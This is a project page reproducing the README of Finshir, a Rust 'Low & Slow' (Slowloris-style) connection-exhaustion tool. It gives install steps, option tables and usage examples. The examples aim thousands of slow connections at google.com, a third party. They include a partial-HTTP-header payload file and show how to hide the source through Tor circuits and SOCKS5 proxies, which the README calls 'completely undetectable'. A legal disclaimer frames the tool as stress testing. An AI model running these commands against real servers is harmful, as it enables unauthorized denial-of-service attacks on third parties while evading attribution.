Hirrolot / Finshir
Programming Languages
Projects that are alternatives of or similar to Finshir
finshir
You are seeing an ergonomic, asynchronous, and fully customisable implementation of Low & Slow load generator designed for real-world pentesting. It can be completely undetectable by proxifying all the connections.
Table of contents
Features
-
Asynchronous. Finshir uses the Tokio runtime for asynchronous I/O to reduce the CPU load significantly and make the program portable between multiple platforms (Windows, GNU/Linux, Mac OS, and other).
-
Generic. Unlike other Low & Slow utilities, Finshir lets you transmit arbitrary data sets over the TCP protocol. It may be partial HTTP headers, empty spaces, and so on.
-
Written in Rust. How you can see, all the logic is written completely in Rust, which means that it leverages bare-metal performance and high-level safety (no SIGSEGV, SIGILL, and other "funny" stuff).
Installation
Building from crates.io
$ cargo install finshir
Building from sources
$ git clone https://github.com/Hippolot/finshir.git
$ cd finshir
$ cargo build --release
Pre-compiled binaries
$ wget https://github.com/Hippolot/finshir/releases/download/vX.X.X/finshir-x86_64-linux
$ chmod a+x finshir-x86_64-linux
Usage
Flags
| Name | Explanation |
|---|---|
-h, --help |
Prints help information |
--use-tls |
Use a TLS connection instead of the ordinary TCP protocol. It might be used to test HTTPS-based services |
-V, --version |
Prints version information |
Options
| Name | Value | Default | Explanation |
|---|---|---|---|
--connect-periodicity |
Time span | 7secs |
This option will be applied if a socket connection error occurs (the next connection will be performed after this periodicity) |
--connect-timeout |
Time span | 10secs |
If a timeout is reached and a socket hasn't been connected, the program will retry the operation later |
--connections |
Positive integer | 1000 |
A number of connections the program will handle simultaneously. This option also equals to a number of concurrent tasks |
--date-time-format |
String | %X |
A format for displaying local date and time in log messages. Type man strftime to see the format specification |
--ip-ttl |
Unsigned integer | 64 |
Specifies the IP_TTL value for all future sockets. Usually this value equals a number of routers that a packet can go through |
--json-report |
Filename | None | A file to which a JSON report (also called a "total summary") will be generated before exiting |
-f, --portions-file |
Filename | None | A file which consists of a custom JSON array of data portions, specified as strings. When a task finished sending all portions, it reconnects its socket and starts sending them again. |
-r, --receiver |
Socket address | None | A receiver of generator traffic, specified as an IP address (or a domain name) and a port number, separated by a colon |
-d, --test-duration |
Time span | 64years 64hours 64secs |
A whole test duration, after which all spawned tasks will stop their work |
--trust-cert-der |
Filename | None | A DER-encoded TLS certificate file to trust while establishing a TLS connection. Can be specified several times |
--trust-cert-pem |
Filename | None | A PEM-encoded TLS certificate file to trust while establishing a TLS connection. Can be specified several times |
--txt-report |
Filename | None | A file to which the program will generate a human-readable report (also called a "total summary") before exiting |
-v, --verbosity |
From 0 to 5 | 3 |
Enable one of the possible verbosity levels. The zero level doesn't print anything, and the last level prints everything. Note that specifying the 4 and 5 verbosity levels might decrease performance, do it only for debugging. |
-w, --wait |
Time span | 5secs |
A waiting time span before test execution used to prevent a launch of an erroneous (unwanted) test |
--write-periodicity |
Time span | 30secs |
A time interval between writing data portions. This option can be used to modify test intensity |
--xml-report |
Filename | None | A file to which an XML report (also called a "total summary") will be generated before exiting |
-p, --proxy |
Proxy format | None | Adds a new SOCKS5 proxy to a list of proxies to use. It accepts either an address or a string of a format [email protected]@PASSWORD.Every new TCP connection will be proxified through a random proxy in a list of all proxies you specified. |
Overview
Minimal command
The following command spawns 1000 tasks, each trying to establish a new TCP connection. When connections are established, it sends empty spaces every 30 seconds, thereby order a server to wait as long as it can:
# Specify one of the Google's IP addresses as a target web server
$ finshir --receiver=google.com:80
Test intensity
Low & Slow techniques assume to be VERY SLOW, which means that you typically send a couple of bytes every N seconds. For instance, Finshir uses the 30 seconds interval by default, but it's modifiable as well:
# Test the Google's server sending data portions every one minute
$ finshir --receiver=google.com:80 --write-periodicity=1min
Using a list of proxies
You can use the --proxy option to specify as many proxies as you want, Finshir will proxify a new connection through a random one. This option can be specified both as <ADDRESS> or as <[email protected]@PASSWORD>.
# Test the Google's server using the 127.0.0.1:8721 local proxy
$ finshir --receiver=google.com:80 --proxy=127.0.0.1:9050
# Test the Google's server using the same proxy with authentication
$ finshir --receiver=google.com:80 --proxy=127.0.0.1:[email protected]@Password123
The default Tor proxy creates a new circuit for each (login, password) pair. That is, if you specify 30 unique (login, password) pairs, then Finshir will torify its traffic through 30 different circuits.
# Test the Google's server using eight Tor circuits created by
# 127.0.0.1:9050 (a default Tor proxy address):
$ finshir --receiver=google.com:80 \
--proxy=127.0.0.1:[email protected]@Password1 \
--proxy=127.0.0.1:[email protected]@Password2 \
--proxy=127.0.0.1:[email protected]@Password3 \
--proxy=127.0.0.1:[email protected]@Password4 \
--proxy=127.0.0.1:[email protected]@Password5 \
--proxy=127.0.0.1:[email protected]@Password6 \
--proxy=127.0.0.1:[email protected]@Password7 \
--proxy=127.0.0.1:[email protected]@Password8
Connections count
The default number of parallel connections is 1000. However, you can modify this limit using the --connections option, but be sure that you system is able to handle such amount of file descriptors:
# Modify the default limit of file descriptors to 17015
$ sudo ulimit -n 17015
# Test the target server using 17000 parallel TCP connections
$ finshir --receiver=google.com:80 --connections=17000
TLS support
Most of web servers today use the HTTPS protocol instead of HTTP, which is based on TLS. Since v0.2.0, Finshir has functionality to connect through TLS using the --use-tls flag.
# Connect to the Google's server through TLS on 443 port (HTTPS)
$ finshir --receiver=google.com:443 --use-tls
Logging options
Consider specifying a custom verbosity level from 0 to 5 (inclusively), which is done by the --verbosity option. There is also the --date-time-format option which tells Finshir to use your custom date-time format.
# Use a custom date-time format and the last verbosity level
$ finshir --receiver=google.com:80 --date-time-format="%F" --verbosity=5
Different verbosity levels print different logging types. As you can see in the table below, the zero verbosity level prints nothing, and the last one prints everything. The levels in the middle print logs selectively:
| Errors | Warnings | Notifications | Debugs | Traces | |
|---|---|---|---|---|---|
| Zero (0) | ❌ | ❌ | ❌ | ❌ | ❌ |
| First (1) | ✔ | ❌ | ❌ | ❌ | ❌ |
| Second (2) | ✔ | ✔ | ❌ | ❌ | ❌ |
| Third (3) | ✔ | ✔ | ✔ | ❌ | ❌ |
| Fourth (4) | ✔ | ✔ | ✔ | ✔ | ❌ |
| Fifth (5) | ✔ | ✔ | ✔ | ✔ | ✔ |
Custom data portions
By default, Finshir generates 100 empty spaces as data portions to send. You can override this behaviour by specifying your custom messages as a file, consisting of a single JSON array. This example is focused on Google:
# Send partial HTTP headers to Google using `--portions-file`
$ finshir --receiver=google.com:443 -f files/google.json --use-tls
The command above sends a partial HTTPS request (first introduced by Slowloris) through TLS (which is achieved by specifying the --use-tls flag). You can access this partial request inside files/google.json.
[
"GET https://www.google.com/ HTTP/1.1\r\n",
"Host: www.google.com\r\n",
"User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n",
"Accept-Language: en-US,en;q=0.5\r\n",
"Accept-Encoding: gzip, deflate, br\r\n",
"Connection: keep-alive\r\n",
"Upgrade-Insecure-Requests: 1\r\n",
"Cache-Control: max-age=0\r\n",
"TE: Trailers\r\n",
"\r\n"
]
Generate a report
Report is a set of test-specific variables like a total number of connections established, a receiver, an execution duration and so on. There is three options for this: --xml-report, --json-report, and --txt-report:
# Test the Google's server and generate JSON and XML reports at the end
$ finshir --receiver=google.com:80 --json-report=report.json --xml-report=report.xml
"At the end" means if allotted time expires or if you cancel the process by Ctrl-C. Also, statistics will being printed to a terminal after every three seconds. You can look at the report examples in the files/example_reports folder:
(files/example_reports/report.json)
{
"connections": {
"failed": 0,
"successful": 50,
"total": 50
},
"receiver": "example.com:80",
"time": {
"test-duration": "10s 478ms 501us 187ns",
"test-start": "Thu, 05 Sep 2019 08:15:13 -0000",
"text-end": "Thu, 05 Sep 2019 08:15:24 -0000"
},
"total-bytes-sent": 50,
"total-errors": 0,
"transmissions": {
"failed": 0,
"successful": 50,
"total": 50
}
}
(files/example_reports/report.xml)
<?xml version="1.0" encoding="UTF-8"?>
<finshir-report>
<receiver>example.com:80</receiver>
<total-bytes-sent>50</total-bytes-sent>
<total-errors>0</total-errors>
<time>
<test-start>Thu, 05 Sep 2019 08:15:13 -0000</test-start>
<test-end>Thu, 05 Sep 2019 08:15:24 -0000</test-end>
<test-duration>10s 480ms 351us 533ns</test-duration>
</time>
<connections>
<successful>50</successful>
<failed>0</failed>
<total>50</total>
</connections>
<transmissions>
<successful>50</successful>
<failed>0</failed>
<total>50</total>
</transmissions>
</finshir-report>
(files/example_reports/report.txt)
*********************** FINSHIR REPORT ***********************
Receiver: example.com:80
Total bytes sent: 50
Total errors: 0
Test start: Thu, 05 Sep 2019 08:15:13 -0000
Test end: Thu, 05 Sep 2019 08:15:24 -0000
Test duration: 10s 482ms 821us 872ns
Successful connections: 50
Failed connections: 0
Total connections: 50
Successful transmissions: 50
Failed transmissions: 0
Total transmissions: 50
**************************************************************
Contributing
You are always welcome for any contribution to this project! But before you start, you should read the appropriate document to know about the preferred development process and the basic communication rules.
Legal disclaimer
Finshir was developed as a means of testing stress resistance of web servers, and not for hacking, that is, the author of the project IS NOT RESPONSIBLE for any damage caused by your use of his program.
Contacts
Temirkhan Myrzamadi <[email protected]> (the author)